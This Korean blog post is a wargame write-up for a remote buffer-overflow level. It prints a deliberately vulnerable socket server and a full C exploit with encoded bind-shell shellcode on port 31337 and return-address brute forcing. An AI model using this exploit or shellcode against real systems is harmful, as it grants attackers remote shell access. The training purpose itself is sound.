일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | 6 | 7 |
8 | 9 | 10 | 11 | 12 | 13 | 14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 |
22 | 23 | 24 | 25 | 26 | 27 | 28 |
29 | 30 | 31 |
- hacking
- c
- 챗GPT
- hackthissite
- ChatGPT
- 경제
- Python
- php
- BOF
- flask
- 러닝스칼라
- hackerschool
- backend
- Linux
- 러닝 스칼라
- 백엔드
- mysql
- Scala
- c++
- 파이썬
- deep learning
- BOF 원정대
- Shellcode
- Web
- Javascript
- 인공지능
- 딥러닝
- 리눅스
- 웹해킹
- webhacking
- Today
- Total
jam 블로그
[bof 원정대] xavius -> death_knight (remote bof) 본문
/*
The Lord of the BOF : The Fellowship of the BOF
- dark knight
- remote BOF
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <dumpcode.h>
main()
{
char buffer[40];
int server_fd, client_fd;
struct sockaddr_in server_addr;
struct sockaddr_in client_addr;
int sin_size;
if((server_fd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
perror("socket");
exit(1);
}
server_addr.sin_family = AF_INET;
server_addr.sin_port = htons(6666);
server_addr.sin_addr.s_addr = INADDR_ANY;
bzero(&(server_addr.sin_zero), 8);
if(bind(server_fd, (struct sockaddr *)&server_addr, sizeof(struct sockaddr)) == -1){
perror("bind");
exit(1);
}
if(listen(server_fd, 10) == -1){
perror("listen");
exit(1);
}
while(1) {
sin_size = sizeof(struct sockaddr_in);
if((client_fd = accept(server_fd, (struct sockaddr *)&client_addr, &sin_size)) == -1){
perror("accept");
continue;
}
if (!fork()){
send(client_fd, "Death Knight : Not even death can save you from me!\n", 52, 0);
send(client_fd, "You : ", 6, 0);
recv(client_fd, buffer, 256, 0);
close(client_fd);
break;
}
close(client_fd);
while(waitpid(-1,NULL,WNOHANG) > 0);
}
close(server_fd);
}
exploit 코드
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define SA struct sockaddr
#define BUFSIZE 256
#define OFFSET 44
char bindport[] =
"\xeb\x11\x5e\x31\xc9\xb1\x6b\x80\x6c\x0e\xff\x35\x80\xe9\x01"
"\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\xe5\x7b\xbd\x0e\x02\xb5"
"\x66\xf5\x66\x10\x66\x07\x85\x9f\x36\x9f\x37\xbe\x16\x33\xf8"
"\xe5\x9b\x02\xb5\xbe\xfb\x87\x9d\xf0\x37\xaf\x9e\xbe\x16\x9f"
"\x45\x86\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\x87\x8b\xbe\x16"
"\xe8\x39\xe5\x9b\x02\xb5\x87\x87\x8b\xbe\x16\x33\xf8\xe5\x9b"
"\x02\xb5\xbe\xf8\x66\xfe\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5"
"\x76\xe5\x74\x02\xb5\x87\x9d\x64\x64\xa8\x9d\x9d\x64\x97\x9e"
"\xa3\xbe\x18\x87\x88\xbe\x16\xe5\x40\x02\xb5";
#define BINDPORT 31337
int main (int argc, char *argv[])
{
int sockfd;
struct sockaddr_in target_addr;
unsigned char buffer[BUFSIZE];
unsigned int retaddr = 0xbffffff0;
char cmd[100];
if (argc != 3) {
fprintf(stderr, "Usage: %s <Target Address> <Port>\n", argv[0]);
return -1;
}
sprintf(cmd, "%s %s %d", "telnet", argv[1], BINDPORT);
while (1) {
if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
perror ("socket error");
return -1;
}
memset(&target_addr, 0, sizeof(target_addr));
target_addr.sin_family = AF_INET;
target_addr.sin_port = htons(atoi(argv[2]));
target_addr.sin_addr.s_addr = inet_addr(argv[1]);
if (connect (sockfd, (SA*)&target_addr, sizeof(target_addr)) == -1) {
perror ("connect error");
close(sockfd);
continue;
}
retaddr -= 10;
memset(buffer, '\x90', sizeof(buffer));
memcpy(buffer+OFFSET, &retaddr, 4);
memcpy(buffer+100, bindport, strlen(bindport));
send(sockfd, buffer, strlen(buffer), 0);
system(cmd);
close(sockfd);
}
return 0;
}
bof 공격
최종인증
'해킹 > 시스템' 카테고리의 다른 글
[시스템] shellcode 모음 사이트 (0) | 2014.09.25 |
---|---|
[bof 원정대] nightmare -> xavius (fgets, destroyer) (0) | 2012.03.31 |
[bof 원정대] succubus -> nightmare (PLT) (0) | 2012.03.31 |
[bof 원정대] zombie_assassin -> succubus (calling functions continuously) (0) | 2012.03.29 |
[bof 원정대] assassin -> zombie_assassin (FEBP;fake ebp) (0) | 2012.03.27 |